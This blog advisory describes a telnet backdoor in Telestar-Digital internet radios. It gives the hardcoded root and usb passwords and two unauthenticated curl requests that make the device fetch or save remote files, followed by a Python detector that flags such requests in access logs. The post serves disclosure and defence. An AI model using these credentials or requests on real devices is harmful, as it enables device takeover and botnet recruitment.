An undocumented telnet backdoor was found in a popular radio player

Summary:

The German technology company Telestar-Digital is a popular producer of Internet radios. A backdoor was found and exploited in the devices by using the open source tools nmap and ncrack.

The vulnerability has been assigned the CVE identifiers CVE-2019-13473 and CVE-2019-13474.

Proof of concept

The default usernames and passwords were:

* root / password

* usb / winbond

The system runs an embedded Linux kernel, which is very common among IoT devices.

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh_frame.init_array. fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes

Several actions can be performed without authentication:

Change the logo:

curl -XGET http://iphere/mylogo?url=http://example.com/own.jpg

Download a file:

curl -XGET 'http://iphere/LocalPlay?url=http://example.com/msg.wav&save=1'
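The two requests above are easy to spot on the wire, because both endpoints take a remote URL as a query parameter and the second one writes the fetched file to the device. The following detector is an added example written for this post, not code from the original advisory or from Telestar-Digital: it parses combined-format web access log lines (the log lines below are constructed samples, and the endpoint names /mylogo and /LocalPlay are taken from the requests above) and flags any request that makes the radio fetch a file from an external host, plus the save=1 case that writes to storage.

```python
"""Flag unauthenticated remote-fetch requests against the radio's
/mylogo and /LocalPlay endpoints in HTTP access logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the advisory that accept a remote URL without authentication.
WATCHED_PATHS = {"/mylogo", "/LocalPlay"}

# Combined log format: client - - [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "client": m.group("client"),
        "method": m.group("method"),
        "path": parts.path,
        "params": parse_qs(parts.query),
        "status": int(m.group("status")),
    }


def classify(entry):
    """Return a list of finding strings for one parsed entry (empty if benign)."""
    findings = []
    if entry["path"] not in WATCHED_PATHS:
        return findings
    url = entry["params"].get("url", [None])[0]
    host = urlsplit(url).hostname if url else None
    # A url parameter with a hostname makes the device fetch from the network;
    # a bare local path (no hostname) is not treated as a remote fetch.
    if host:
        findings.append(f"remote fetch from {host}")
    if entry["path"] == "/LocalPlay" and entry["params"].get("save") == ["1"]:
        findings.append("file written to device storage (save=1)")
    return findings


def scan(lines):
    """Return (client, path, finding) tuples for every suspicious request in lines."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for finding in classify(entry):
            results.append((entry["client"], entry["path"], finding))
    return results


# Constructed sample log lines; the addresses and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2019:12:00:01 +0000] '
    '"GET /mylogo?url=http://example.com/own.jpg HTTP/1.1" 200 12',
    '203.0.113.7 - - [10/Jul/2019:12:00:02 +0000] '
    '"GET /LocalPlay?url=http://example.com/msg.wav&save=1 HTTP/1.1" 200 12',
    '192.168.1.20 - - [10/Jul/2019:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.168.1.20 - - [10/Jul/2019:12:00:04 +0000] '
    '"GET /LocalPlay?url=/media/local.wav HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for client, path, finding in scan(SAMPLE_LOG):
        print(f"{client} {path}: {finding}")
```

Running it on the sample lines reports the two requests from 203.0.113.7 (three findings in total, since the LocalPlay request both fetches from example.com and saves the file) and stays silent on the normal page load and on the LocalPlay request that names only a local path. Pointing the same parser at a proxy or IDS log in front of the radios gives a quick inventory of which devices have been told to pull content from the outside.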

This vulnerability and backdoor are most likely to be used in larger automated attacks such as the Mirai botnet.

External links:

Telestar.de

Vulnerability labs article

Mirai botnet cloudflare

Mirai botnet wikipedia


This blog post is part of the exploit of the day series, where we write a shorter description about interesting exploits that we index.